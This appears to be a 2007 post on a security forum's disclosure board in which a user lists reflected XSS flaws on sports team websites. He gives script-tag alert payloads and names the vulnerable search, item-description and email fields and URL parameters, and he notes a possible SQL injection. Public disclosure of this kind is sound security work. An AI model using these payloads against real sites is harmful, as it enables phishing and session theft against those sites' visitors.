Paid Advertising is
ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 12:05AM

Like millions of people, I love sports and I regularly go to my favorite team sites to catch up on the latest news. I also sign up for newsletters notifying me of the latest events. Thinking about this though brings up the definite possibility of targeted phishing attacks using these types of sites. So I decided I would check and see which sites had obvious xss issues. ("><script>alert('xss');</script> in "Chiefs Pulse" field)<script>alert('xss');</script> ("><script>alert('xss');</script> in Item Description or Product #) Funny thing is they filter the search box...!REEB&csurl="><script>alert('xss');</script> ("><script>alert('xss');</script in email field) ('><script>alert('xss');</script> in search field)<script>alert('xss');</script> ("><script>alert('xss');</script> in search field) ("><script>alert('xss');</script> in item description field) Note: appears to be sql injectible as well."><script>alert(1);</script>&month= ("><script>alert('xss');</script> in Item Description field) ("><script>alert('xss');</script> in Item Description field) ("><script>alert(1);</script> in search field) (<script>alert(1);</script> in search field)$2Fteam%2Farticle.jsp%3Fid%3D&title="><script>alert(1);</script>"><script>alert(1);</script>&searchkeyword=test ("><script>alert(1);</script> in Item Description field)"><script>alert(1);</script></title><script>alert(1);</script>

Edited 3 time(s). Last edit at 03/02/2007 12:27AM by Mephisto.

Options: ReplyQuote
Re: Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 10:58PM"><script>alert(1);</script>&position=0&splitType=9&splitScope=GAME&qualified=N&yearsExp=-1&splitDD=""><script>alert(1);</script> <-- it throws numerous alerts

Options: ReplyQuote

Sorry, only registered users may post in this forum.